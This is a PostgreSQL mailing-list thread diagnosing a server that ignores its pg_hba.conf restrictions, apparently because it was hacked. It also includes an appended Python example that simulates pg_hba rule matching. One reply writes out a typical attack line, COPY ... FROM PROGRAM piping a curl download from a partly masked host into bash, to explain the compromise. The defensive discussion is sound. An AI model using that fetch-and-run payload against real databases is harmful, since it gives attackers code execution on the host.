Re: How to confirm the pg_hba.conf service is correctly working - Mailing list pgsql-general

From Imre Samu
Subject Re: How to confirm the pg_hba.conf service is correctly working
Date
Msg-id CAJnEWw=xdEhw=ZBrM0=oM6oSdJwwUujKSbVzQwc-hpw802O2YQ@mail.gmail.com
In response to Re: How to confirm the pg_hba.conf service is correctly working  (shing dong <s7eqs7eq@gmail.com>)
List pgsql-general
> Have checked  select * from pg_hba_file_rules results are consistent with pg_hba.conf
> any ip and user still can login in db   

Any proxy? Port/IP forwarding running in the background?

Next time, check the "client_addr":
-  SELECT usename, client_addr FROM pg_stat_activity WHERE client_addr IS NOT NULL;


> a Postgres DB that was Hacked l
> When I remove pg  software and reinstall pg software

I agree with others;  
- please re-install the full system!  ( not just the PostgreSQL! )

Usually, the attack sequence:   
 - open port, brute force attack + COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';
so you can expect "anything" installed and running hidden in the background.



> host   VJ   VJ_USER   10.10.10.1/32 md5

imho:
- use different ports 
- change "md5" to "scram-sha-256"
- for administration, use SSH tunnels: https://www.postgresql.org/docs/10/ssh-tunnels.html (and use a firewall for closing all external ports, or use SSL)

 Regards,
   Imre


shing dong <s7eqs7eq@gmail.com> wrote (on Thu, Dec 23, 2021, 11:15):
Your original post stated that you only had 
host   VJ   VJ_USER   10.10.10.1/32 md5 
in the pg_hba.conf file.
However the result of the select is considerably more ?


DEAR 

I have tested this feature, only had

host   VJ   VJ_USER   10.10.10.1/32 md5

in the pg_hba.conf file  

Have checked  select * from pg_hba_file_rules results are consistent with pg_hba.conf

any ip and user still can login in db   

When I remove pg software and reinstall pg software, the function of pg_hba is working, which represents that the location and content of pg_hba.conf are correct

Suspect that the function of pg_hba is destroyed?

Dave Cramer <davecramer@postgres.rocks> wrote on Wed, Dec 22, 2021 at 6:58 PM:


On Tue, 21 Dec 2021 at 22:57, shing dong <s7eqs7eq@gmail.com> wrote:
Dear  Dave 

The result after reload is

2021-12-21 23:02:43.829 -04,,,36848,,61bf6ecf.8ff0,9,,2021-12-19 13:41:35 -04,,0,LOG,00000,"received SIGHUP, reloading configuration files",,,,,,,,,""

No other error message

------------------------------------------

result of  select * from pg_hba_file_rules


line_number,type,database,user_name,address,netmask,auth_method,options,error
84,local,{all},{all},,,md5,,
86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
87,host,{replication},{replica},127.0.0.1,255.255.255.255,md5,,
88,host,{replication},{replica},10.34.21.85,255.255.255.255,md5,,
89,host,{replication},{repl},10.37.12.13,255.255.255.255,md5,,
92,host,{product},{querysysuser},13.75.66.131,255.255.255.255,md5,,
93,host,{product},{collector},10.32.61.98,255.255.255.255,md5,,
94,host,{product},{collector_new},10.34.61.98,255.255.255.255,md5,,
95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,,
96,host,{product},{MylIZ8UUIFO7KZBh1hXEnCPHqugzAm},10.21.99.177,255.255.255.255,md5,,
99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,,
100,host,{product},{product_member},10.33.132.42,255.255.255.255,md5,,
101,host,{product},{product_member},10.33.132.43,255.255.255.255,md5,,
102,host,{product},{product_member},10.33.132.44,255.255.255.255,md5,,
103,host,{product},{product_member},10.33.132.45,255.255.255.255,md5,,
104,host,{product},{product_member},10.33.132.51,255.255.255.255,md5,,
105,host,{product},{product_member},10.33.132.52,255.255.255.255,md5,,
106,host,{product},{product_member},10.33.132.53,255.255.255.255,md5,,
107,host,{product},{product_member},10.33.132.54,255.255.255.255,md5,,
108,host,{product},{product_member},10.33.132.55,255.255.255.255,md5,,
109,host,{product},{product_member},10.33.132.61,255.255.255.255,md5,,
110,host,{product},{product_member},10.33.132.62,255.255.255.255,md5,,
111,host,{product},{product_member},10.33.132.63,255.255.255.255,md5,,
112,host,{product},{product_member},10.33.132.64,255.255.255.255,md5,,
113,host,{product},{product_member},10.33.132.65,255.255.255.255,md5,,
114,host,{product},{product_member},10.34.32.41,255.255.255.255,md5,,
115,host,{product},{product_member},10.34.32.42,255.255.255.255,md5,,
116,host,{product},{product_member},10.34.32.43,255.255.255.255,md5,,
117,host,{product},{product_member},10.34.32.44,255.255.255.255,md5,,
118,host,{product},{product_member},10.34.32.45,255.255.255.255,md5,,
119,host,{product},{product_member},10.34.32.46,255.255.255.255,md5,,
120,host,{product},{product_member},10.34.32.51,255.255.255.255,md5,,
121,host,{product},{product_member},10.34.32.52,255.255.255.255,md5,,
122,host,{product},{product_member},10.34.32.53,255.255.255.255,md5,,
123,host,{product},{product_member},10.34.32.54,255.255.255.255,md5,,
124,host,{product},{product_member},10.34.32.55,255.255.255.255,md5,,
125,host,{product},{product_member},10.34.32.56,255.255.255.255,md5,,
126,host,{product},{product_member},10.34.32.61,255.255.255.255,md5,,
127,host,{product},{product_member},10.34.32.62,255.255.255.255,md5,,
128,host,{product},{product_member},10.34.32.63,255.255.255.255,md5,,
129,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
130,host,{product},{product_member},10.34.32.65,255.255.255.255,md5,,
131,host,{product},{product_member},10.34.32.66,255.255.255.255,md5,,
132,host,{product},{product_member},10.34.32.57,255.255.255.255,md5,,
133,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
135,host,{product},{product_agent},10.34.32.21,255.255.255.255,md5,,
136,host,{product},{product_agent},10.34.32.22,255.255.255.255,md5,,
137,host,{product},{product_agent},10.34.32.23,255.255.255.255,md5,,
138,host,{product},{product_agent},10.34.32.31,255.255.255.255,md5,,
139,host,{product},{product_agent},10.34.32.32,255.255.255.255,md5,,
140,host,{product},{product_agent},10.34.32.33,255.255.255.255,md5,,
141,host,{product},{product_agent},10.34.32.34,255.255.255.255,md5,,
142,host,{product},{product_agent},10.34.32.35,255.255.255.255,md5,,
143,host,{product},{product_agent},10.34.32.36,255.255.255.255,md5,,
144,host,{product},{product_agent},10.34.32.37,255.255.255.255,md5,,
145,host,{product},{product_agent},10.34.32.38,255.255.255.255,md5,,
146,host,{product},{product_agent},10.33.132.21,255.255.255.255,md5,,
147,host,{product},{product_agent},10.33.132.31,255.255.255.255,md5,,
148,host,{product},{product_agent},10.33.132.32,255.255.255.255,md5,,
149,host,{product},{product_agent},10.33.132.33,255.255.255.255,md5,,
150,host,{product},{product_agent},10.33.132.34,255.255.255.255,md5,,
153,host,{product},{product_dba},10.20.16.101,255.255.255.255,md5,,
154,host,{product},{product_dba},10.20.16.102,255.255.255.255,md5,,
155,host,{product},{product_dba},10.20.16.103,255.255.255.255,md5,,
156,host,{product},{product_dba},10.20.16.104,255.255.255.255,md5,,
157,host,{product},{product_dba},10.20.16.105,255.255.255.255,md5,,
161,host,{product},{dbcheck},10.34.21.118,255.255.255.255,md5,,
165,host,{product},{product_dba},10.3.10.2,255.255.255.255,md5,,
168,host,{product},{product_dba},10.3.10.13,255.255.255.255,md5,,





Hmmm for some reason I did not reply to the list. 

At any rate. 

Your original post stated that you only had 

host   VJ   VJ_USER   10.10.10.1/32 md5 

in the pg_hba.conf file.

However the result of the select is considerably more ?


Dave Cramer
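
Why the proxy question and the "client_addr" check in the reply matter, as an added example that is not part of the original thread: a first-match walk over a subset of the pg_hba_file_rules rows quoted above, showing that a client outside every listed address is rejected when it connects directly but lands on the line 86 all/all rule when something on the database host relays it as 127.0.0.1. Assumptions: only plain `host` rows, the `all` keyword and literal names are handled, and the test address and user name are constructed.

```python
import csv
import io
import ipaddress

# Subset of the pg_hba_file_rules rows quoted in the thread (same CSV layout).
RULES_CSV = '''line_number,type,database,user_name,address,netmask,auth_method,options,error
84,local,{all},{all},,,md5,,
86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
87,host,{replication},{replica},127.0.0.1,255.255.255.255,md5,,
93,host,{product},{collector},10.32.61.98,255.255.255.255,md5,,
95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,,
'''

def _names(array_text):
    """Turn a Postgres array literal such as {a,b} into a set of names."""
    return {n.strip('"') for n in array_text.strip("{}").split(",")}

def parse_rules(text):
    """Parse CSV rows into (line, type, databases, users, network, method)."""
    rules = []
    for row in csv.DictReader(io.StringIO(text)):
        if row["error"]:
            continue  # the view reported a problem with this line
        net = None
        if row["address"]:  # IPv4 address plus dotted netmask, as in the thread
            net = ipaddress.ip_network(f'{row["address"]}/{row["netmask"]}', strict=False)
        rules.append((int(row["line_number"]), row["type"], _names(row["database"]),
                      _names(row["user_name"]), net, row["auth_method"]))
    return rules

def first_match(rules, database, user, client_addr):
    """Return (line_number, auth_method) of the first matching host rule, or None."""
    ip = ipaddress.ip_address(client_addr)
    for line, kind, dbs, users, net, method in rules:
        if kind != "host" or net is None:
            continue  # local / hostssl / hostnossl entries are not modelled here
        if "replication" in dbs:
            continue  # keyword for replication connections, not a database name
        if ip in net and dbs & {"all", database} and users & {"all", user}:
            return line, method
    return None  # no entry matches: the server rejects the connection

RULES = parse_rules(RULES_CSV)
# Constructed cases: 203.0.113.7 is a documentation address, "someuser" is hypothetical.
DIRECT = first_match(RULES, "product", "someuser", "203.0.113.7")
VIA_LOCAL_FORWARDER = first_match(RULES, "product", "someuser", "127.0.0.1")
```

On a live system the value to feed in is the "client_addr" returned by the pg_stat_activity query in the reply: remote users whose sessions show 127.0.0.1 are being relayed by something running on the database host.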
